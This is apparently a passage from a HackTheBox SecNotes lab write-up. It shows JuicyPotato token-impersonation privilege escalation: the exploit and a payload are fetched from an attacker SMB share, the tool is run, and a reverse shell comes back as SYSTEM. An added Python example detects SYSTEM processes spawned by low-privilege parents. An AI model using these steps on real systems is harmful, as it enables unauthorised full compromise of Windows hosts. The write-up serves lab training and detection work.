JuicyPotato


I found out that the user has SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege

Let’s go

Exploitation


PS C:\tmp> copy \\10.10.14.6\smb\JuicyPotato.x86.exe
PS C:\tmp> copy \\10.10.14.6\smb\pe.exe

I transferred the exploit and payload

C:\tmp>.\JuicyPotato.x86.exe 
JuicyPotato v0.1 
 
Mandatory args: 
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both
-p <program>: program to launch
-l <port>: COM server listen port
 
 
Optional args: 
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user

JuicyPotato provides a help menu

The command looks like this: .\JuicyPotato.exe -t * -p "C:\tmp\pe.exe" -l 24492

-t * tries both CreateProcessWithTokenW and CreateProcessAsUser
-p launches the payload (pe.exe) with elevated privileges once exploitation succeeds
-l sets the port the local COM server listens on; any free port will do

PS C:\tmp> cmd /c C:\tmp\JuicyPotato.exe -t * -p "C:\tmp\pe.exe" -l 24492
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 24492
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
 
[+] CreateProcessWithTokenW OK

The exploit succeeded: it created a new process with SYSTEM privileges and executed the payload.

┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ nnc 1234      
listening on [any] 1234 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.97] 60149
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32> hostname
SECNOTES
PS C:\WINDOWS\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::250
   IPv6 Address. . . . . . . . . . . : dead:beef::6832:cf76:958b:2105
   Temporary IPv6 Address. . . . . . : dead:beef::2d54:dd95:22b0:d056
   Link-local IPv6 Address . . . . . : fe80::6832:cf76:958b:2105%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.97
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2

System Level Compromise
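From the defender's side, the trace this leaves is a process running as SYSTEM whose parent ran as an ordinary (non-SYSTEM) account. The following added detection example is not part of the original writeup; its event records are constructed and simplified (field names mirror Sysmon Event ID 1 but nothing is parsed from real event XML), and the account name SECNOTES\lowpriv is a placeholder.

```python
# Added detection example (not from the original writeup): flags process-creation
# events where a SYSTEM child was spawned by a parent running as a non-SYSTEM
# account, the shape left behind when a token-impersonation tool such as
# JuicyPotato launches its payload. Records are constructed and simplified
# (field names mirror Sysmon Event ID 1 but are not parsed from real XML).
import csv
from io import StringIO
from typing import Dict, List

SYSTEM = "NT AUTHORITY\\SYSTEM"

# Constructed sample events: a normal service start, the pattern from the
# writeup (payload spawned as SYSTEM from a low-privilege parent), and the
# tool itself being started by the low-privilege user. "lowpriv" is a placeholder.
SAMPLE_EVENTS = """\
event_id,parent_user,parent_image,user,image
1,NT AUTHORITY\\SYSTEM,C:\\Windows\\System32\\services.exe,NT AUTHORITY\\SYSTEM,C:\\Windows\\System32\\svchost.exe
1,SECNOTES\\lowpriv,C:\\tmp\\JuicyPotato.exe,NT AUTHORITY\\SYSTEM,C:\\tmp\\pe.exe
1,SECNOTES\\lowpriv,C:\\Windows\\System32\\cmd.exe,SECNOTES\\lowpriv,C:\\tmp\\JuicyPotato.exe
"""

# Parent images allowed to hand out SYSTEM tokens; tune per environment.
TRUSTED_PARENTS = {
    "c:\\windows\\system32\\services.exe",
    "c:\\windows\\system32\\wininit.exe",
}


def parse_events(text: str) -> List[Dict[str, str]]:
    """Parse the CSV-shaped event records into dictionaries."""
    return list(csv.DictReader(StringIO(text)))


def is_suspicious(ev: Dict[str, str]) -> bool:
    """True when a SYSTEM child comes from a parent that is neither SYSTEM
    nor one of the trusted system processes."""
    if ev["event_id"] != "1" or ev["user"].upper() != SYSTEM.upper():
        return False
    if ev["parent_user"].upper() == SYSTEM.upper():
        return False
    return ev["parent_image"].lower() not in TRUSTED_PARENTS


def flag_token_abuse(text: str) -> List[str]:
    """Return 'parent_image -> image' for every suspicious event."""
    return [f'{ev["parent_image"]} -> {ev["image"]}'
            for ev in parse_events(text) if is_suspicious(ev)]


if __name__ == "__main__":
    for hit in flag_token_abuse(SAMPLE_EVENTS):
        print("[!] SYSTEM child from non-SYSTEM parent:", hit)
```

Only the second record is flagged: the service-host start is a SYSTEM parent, and the tool launch itself never reaches SYSTEM.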